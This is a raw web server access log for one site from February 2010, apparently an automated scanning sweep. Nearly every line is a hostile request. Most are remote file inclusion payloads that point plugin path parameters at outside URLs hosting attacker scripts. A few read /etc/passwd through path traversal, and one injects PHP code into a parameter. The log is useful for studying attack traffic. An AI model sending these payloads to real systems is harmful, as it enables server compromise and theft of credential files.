75.125.186.154 - - [19/Feb/2010:05:33:47 -0800] "GET /logs/access_100207.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:34:20 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:34:20 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:34:20 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:05:34:20 -0800] "GET /logs/access_100207.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:05:34:45 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:05:34:45 -0800] "GET /logs/access_100206.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:05:34:45 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:05:35:32 -0800] "GET /logs/access_100202.log//bbs/delete_all.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:05:35:37 -0800] "GET /logs/access_100129.log//bbs/delete_all.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:39:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:39:48 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:39:49 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:39:51 -0800] "GET /logs/access_100121.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:39:56 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:39:56 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:39:56 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:40:11 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:40:25 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:41:18 -0800] "GET /logs/access_100121.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:05:41:27 -0800] "GET /bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:05:41:27 -0800] "GET /logs/access_100206.log%20%20//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:05:41:27 -0800] "GET /logs//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [19/Feb/2010:05:41:41 -0800] "GET /logs/access_100121.log%20%20//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:42:19 -0800] "GET /logs/access_100111.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:42:19 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:42:20 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:44:16 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:44:16 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:44:21 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:44:40 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:44:40 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:44:40 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:44:44 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:44:44 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:44:44 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:45:45 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:45:45 -0800] "GET /logs/access_100111.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:45:46 -0800] "GET /logs/access_100210.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:45:46 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:45:55 -0800] "GET /logs/access_100210.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [19/Feb/2010:05:45:57 -0800] "GET /logs/access_100210.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:46:18 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:48:19 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:48:50 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:48:50 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:48:50 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:48:54 -0800] "GET /logs/access_100111.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:49:14 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:49:14 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:49:15 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:49:19 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:49:19 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:49:19 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:05:49:31 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:05:49:31 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:05:49:31 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:49:33 -0800] "GET /logs/errors.php?error=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:49:33 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:49:33 -0800] "GET /errors.php?error=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:05:49:41 -0800] "GET /logs/access_100115.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:49:45 -0800] "GET /logs/access_100129.log%20%20/errors.php?error=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:50:05 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:50:08 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:50:09 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:50:09 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:05:51:03 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:51:06 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:51:06 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:51:06 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:51:13 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:51:15 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:51:15 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:51:15 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:05:51:20 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:05:51:20 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:05:51:20 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:51:23 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:51:26 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:51:26 -0800] "GET /logs/access_100129.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:51:27 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:51:30 -0800] "GET /logs/access_100111.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:51:37 -0800] "GET /logs/access_100122.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:51:37 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:05:51:38 -0800] "GET /logs/access_100115.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:05:52:19 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:05:53:45 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:05:53:46 -0800] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:05:53:46 -0800] "GET /logs/access_100129.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:03 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:03 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:03 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:03 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:03 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:04 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:05:54:04 -0800] "GET /logs/access_100121.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:26 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:26 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:26 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [19/Feb/2010:05:54:37 -0800] "GET /logs/access_100115.log//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
209.90.101.2 - - [19/Feb/2010:05:54:38 -0800] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
209.90.101.2 - - [19/Feb/2010:05:54:38 -0800] "GET /logs//temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:54:56 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:05:55:00 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:55:14 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:05:55:14 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
